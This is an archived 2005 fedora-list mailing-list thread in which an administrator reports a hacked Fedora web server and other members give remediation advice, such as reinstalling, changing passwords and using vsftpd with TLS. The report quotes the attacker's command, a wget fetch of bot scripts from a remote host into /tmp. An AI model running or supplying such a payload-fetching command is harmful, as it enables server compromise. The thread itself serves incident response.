Server compromissed
dan
info at hostinthebox.net
Sat Feb 19 00:24:54 UTC 2005
paul at topguncomputers.com wrote:
>>On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul at topguncomputers.com
>><paul at topguncomputers.com> wrote:
>>
>>>Apparently someone has hacked into my webserver. And is installing perl
>>>scripts into he /tmp/ directory. There usually named .linuxday* or
>>>.cinta* and a few other names as well.
>>>
>>>>From what I can tell something is causing apache to run a command like
>>>"sh
>>>wget bot.linuxday.com.br -O {the above mentioned files are than
>>>listed}"
>>>
>>>sometimes the site is worm.linuxday.com.br
>>>
>>>I'm curious if anyone has heard about this before. I'm currently
>>>running
>>>Fedora 1 with all the latests security patches.
>>
>>The only way to ensure your system is clean, and likely to remain clean,
>>is to:
>>
>>1. Do a bare metal install
>>2. Change all passwords to new strong passwords
>>3. Disable cleartext services, ftp, telnet, rsh, etc.
>>4. Disable root remote login (use su or sudo)
>>5. Restore your uncompromised data
>>6. etc.
>>I had to do this for a client and the next 3 days the intruder tried
>>to get back in.
>>
>>--
>>Leonard Isham, CISSP
>>Ostendo non ostento.
>>
>>--
>>fedora-list mailing list
>>fedora-list at redhat.com
>>To unsubscribe: http://www.redhat.com/mailman/listinfo/fedora-list
>>
>
>
> In replace of FTP what would you suggest. That is the only clear text
> password service I allow. So what else can I use in replace of that.
>
> And shell access is denied for all accounts. except for 2.
>
> I get the feeling this came in on awstats all though I'm not 100% positive
> and I'm wanting to find out how it got in first before I just delete and
> restart over again.
>
That AWStats hit me a couple times, which sucked. I had all kinds of
cool movies put on the server by whoever popped it.
But in all seriousness, vsftpd uses tls/ssl connections, so you can
avoid cleartext passwords altogether. It's working quite nicely for me.
Hope that helps
-dant
More information about the fedora-list
mailing list